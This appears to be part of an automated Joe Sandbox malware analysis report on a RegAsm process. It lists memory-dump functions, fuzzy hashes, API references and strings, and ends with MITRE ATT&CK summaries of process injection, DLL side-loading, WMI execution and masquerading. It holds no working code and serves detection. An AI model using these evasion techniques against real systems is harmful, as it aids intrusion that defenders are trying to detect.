Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: d417de8c9a0a209709a6de5710935ff17af1f368871aa643ccc311d4d337ff47
Instruction ID: db14e26b0bbffc5ca6930250cbb399bf26d4a56846ee06bee85017f3032141ff
Opcode Fuzzy Hash: d417de8c9a0a209709a6de5710935ff17af1f368871aa643ccc311d4d337ff47
Instruction Fuzzy Hash: 69F0BEBA900028BBC7149BDAAC499BFB7FDEF09B02F00514AFA4592180E7784950D3B4

Uniqueness

Uniqueness Score: -1.00%

Function 19C5BE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19C5C1B5

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: ce9cbd6f62614f1cba52c269b26653f6d8320a6e295440439d3016ee8b084024
Instruction ID: 300d1c8f6c5ce5bda172dde4c2e41c4f5190834a5dfbe906f15221d6774d0c10
Opcode Fuzzy Hash: ce9cbd6f62614f1cba52c269b26653f6d8320a6e295440439d3016ee8b084024
Instruction Fuzzy Hash: 7DA10576F487868FF7048E28EC41756BBD1AFC5220F5C1B2DE4E3972D1E760D4858A89

Uniqueness

Uniqueness Score: -1.00%

Function 19DC7300 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

%!.15g, xrefs: 19DC75C3
-, xrefs: 19DC7538

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$-
API String ID: 0-583212262
Opcode ID: 220d9ce6afa77c81df34151e8282fe02043837f34619375c0d65a026b40c9c52
Instruction ID: a04db27b01ed6fb2bc5a3744806cc9a1d49e9ac8e3fce40b298f0c633b31c607
Opcode Fuzzy Hash: 220d9ce6afa77c81df34151e8282fe02043837f34619375c0d65a026b40c9c52
Instruction Fuzzy Hash: B9918871A083468FD304DF6CD89175AFBE0EBC8344F48492DE899CB351E7B9D9098B92

Uniqueness

Uniqueness Score: -1.00%

Function 19D678F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

?, xrefs: 19D6794A
*, xrefs: 19D67982

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: *$?
API String ID: 0-2367018687
Opcode ID: a36a1243ef2a44ce17b07d0c73322cc3c19ede39c6f5aa2c38aae362867366a1
Instruction ID: 2c56e8444dfe7eb5a7fa9c8c28bba4553f8e33faf8e7961576a1fbd8483d84b0
Opcode Fuzzy Hash: a36a1243ef2a44ce17b07d0c73322cc3c19ede39c6f5aa2c38aae362867366a1
Instruction Fuzzy Hash: 6C713670A083998FD3118F68C88471BBBE6EF85300F0E496DE8CD97761E775DA4587A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C5D0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19C5D213

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 29d1cd72ab8af950f43026d6e4933df3b0eb577ec880b76230a8d1eeed200778
Instruction ID: 1845bf9635e2fd4210dfc8437452d88d1fa6067eb854caa595dbd1197317b6fd
Opcode Fuzzy Hash: 29d1cd72ab8af950f43026d6e4933df3b0eb577ec880b76230a8d1eeed200778
Instruction Fuzzy Hash: A3415777A043414BF7108A28BC4179B7B969B51330F1C4A38E8DA936D3DA26E64AC396

Uniqueness

Uniqueness Score: -1.00%

Function 00406850 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?), ref: 0040689E
GetProcAddress.KERNEL32(?,?), ref: 00406978

Strings

)k@, xrefs: 0040693E, 00406892, 00406991

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: )k@
API String ID: 2574300362-940070785
Opcode ID: 6f71164811d6df8cda258bcf4f135a328c4db8ad1a51c5915c461280e51b821c
Instruction ID: c39d4b3fe26b647a66bf522e9f735de2ad8918ca6e8eb657aee87430fdef1d80
Opcode Fuzzy Hash: 6f71164811d6df8cda258bcf4f135a328c4db8ad1a51c5915c461280e51b821c
Instruction Fuzzy Hash: 69418EB17017059BDB20CF69D8807ABF3E8AF84315F1545BAD84EDB381E639E8258B54

Uniqueness

Uniqueness Score: -1.00%

Function 19C555D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 19C556D1
winDelete, xrefs: 19C5569C

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 0-1405699761
Opcode ID: 1dc927e5970ca26472e1446857901d8b280e953c9a28de508e1ff8dd243c5f48
Instruction ID: 9de0ae6451b30804f4d374cafe02f40fd1ea03d08ffed343be3b4412c70a92b1
Opcode Fuzzy Hash: 1dc927e5970ca26472e1446857901d8b280e953c9a28de508e1ff8dd243c5f48
Instruction Fuzzy Hash: A13158B3F002E18BF7023AB8FCCC95A7758A7203A1F090522ED9BC23D1DE219444869A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F890 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F905
memcpy.MSVCRT ref: 0040F956

Part of subcall function 0040F7A0: std::_Xinvalid_argument.LIBCPMT ref: 0040F7BA

Strings

string too long, xrefs: 0040F900

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: e85a922af9ebbab45aabda57f093e6fe58dac93bd2c7f3220933ca98c57c2012
Instruction ID: b5ddb5f07250de15edbe22c83bac0e8ada76cede5f33fbd1d3110154bac4181d
Opcode Fuzzy Hash: e85a922af9ebbab45aabda57f093e6fe58dac93bd2c7f3220933ca98c57c2012
Instruction Fuzzy Hash: E631F9333106105BE734AE5CA880A6AF7E9EF95720B20493FF581D7BC0C7799C488399

Uniqueness

Uniqueness Score: -1.00%

Function 19C5D300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 19C5D3D5

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: bb3bb62ba115b900f063bd2ea58cec3327fadd325374808097dfab39070f6c19
Instruction ID: 84b7570faa667f2d1cab09e0a2d2ff671590c8ffd116834c90a702bec8bbf61d
Opcode Fuzzy Hash: bb3bb62ba115b900f063bd2ea58cec3327fadd325374808097dfab39070f6c19
Instruction Fuzzy Hash: 933138B6B043249BF7004A14BC01B6677699B86334F2C42A9F8D76B3C3D667E857C2A5

Uniqueness

Uniqueness Score: -1.00%

Function 19DD7E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

OsError 0x%lx (%lu), xrefs: 19DD7ED9

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: OsError 0x%lx (%lu)
API String ID: 0-3720535092
Opcode ID: c1ead4df8bbe95a14aa2210b09cdcff18fe002db2e231594e15683b51a64b114
Instruction ID: cca1b20cd9af2d57167071f3fbbd1be4a75785c707d6977b8f0ae98eb8c0f5e9
Opcode Fuzzy Hash: c1ead4df8bbe95a14aa2210b09cdcff18fe002db2e231594e15683b51a64b114
Instruction Fuzzy Hash: 12218E71A003A1ABE603ABB4EC8CB5B37A8EF04395F184424FD49D1290DB31D910D792

Uniqueness

Uniqueness Score: -1.00%

Function 19C75350 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 19C7539B

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 478fe74649534c8adcf26176d91d9affe8cf8cfdffb9e6b1b78e7428e7b165f0
Instruction ID: e23a37516ca0bf889d274e8fb956e11f4668d6577e2cc925ab3999ff06bd51d2
Opcode Fuzzy Hash: 478fe74649534c8adcf26176d91d9affe8cf8cfdffb9e6b1b78e7428e7b165f0
Instruction Fuzzy Hash: B61160B66083808FD704DF25D45175FBBE4AFD8214F98486EE88A87290EB74E548CB93

Uniqueness

Uniqueness Score: -1.00%

Function 0040F580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F596

Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC75
Part of subcall function 0041FC60: __CxxThrowException@8.LIBCMT ref: 0041FC8A
Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC9B

memmove.MSVCRT ref: 0040F5CF

Strings

invalid string position, xrefs: 0040F591

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: bcf694971f287d0a7553bfea25672fbe8ca6af17fe9a7413021174007575ee50
Instruction ID: 53bf75527ab3bf274367aba823a209b8e3b66f0f9231be3ffe00ec12181ebe73
Opcode Fuzzy Hash: bcf694971f287d0a7553bfea25672fbe8ca6af17fe9a7413021174007575ee50
Instruction Fuzzy Hash: 5F01DB32310250ABD734CD6CED8095AB3EAEBD5710B24493FE185DBB82D674DC4A87D8

Uniqueness

Uniqueness Score: -1.00%

Function 19C77200 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

Strings

API call with %s database connection pointer, xrefs: 19C77220
invalid, xrefs: 19C7721B

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: API call with %s database connection pointer$invalid
API String ID: 0-3574585026
Opcode ID: 51197203e43fffed98f023d23f2556617a05bb31a2a657cecd66170ba776b570
Instruction ID: 8e7dcf542a279d15886e0b2874227d470473acfa9e876d2d0af0169353a2818e
Opcode Fuzzy Hash: 51197203e43fffed98f023d23f2556617a05bb31a2a657cecd66170ba776b570
Instruction Fuzzy Hash: 6EF0F672F06718CBDA145668FC14B9377DA5F40721F0D4555F5F6D27D2C220E454C291

Uniqueness

Uniqueness Score: -1.00%

Function 19D23C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

%z%s%z, xrefs: 19D23C6B

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %z%s%z
API String ID: 0-3434679432
Opcode ID: 00ef3a7eb0f36145eab62661b1be66f082a6bec7b77a8de506201000108e99b8
Instruction ID: 0fe8d989686f3450f9d7a91df130c1fcd5d7d53739617c6b8b889052e4f37a7c
Opcode Fuzzy Hash: 00ef3a7eb0f36145eab62661b1be66f082a6bec7b77a8de506201000108e99b8
Instruction Fuzzy Hash: CDF0E2B0600702CFEB108B11D801767B3E8FF94204F8C592DEC86C2940EB31FC449B51

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
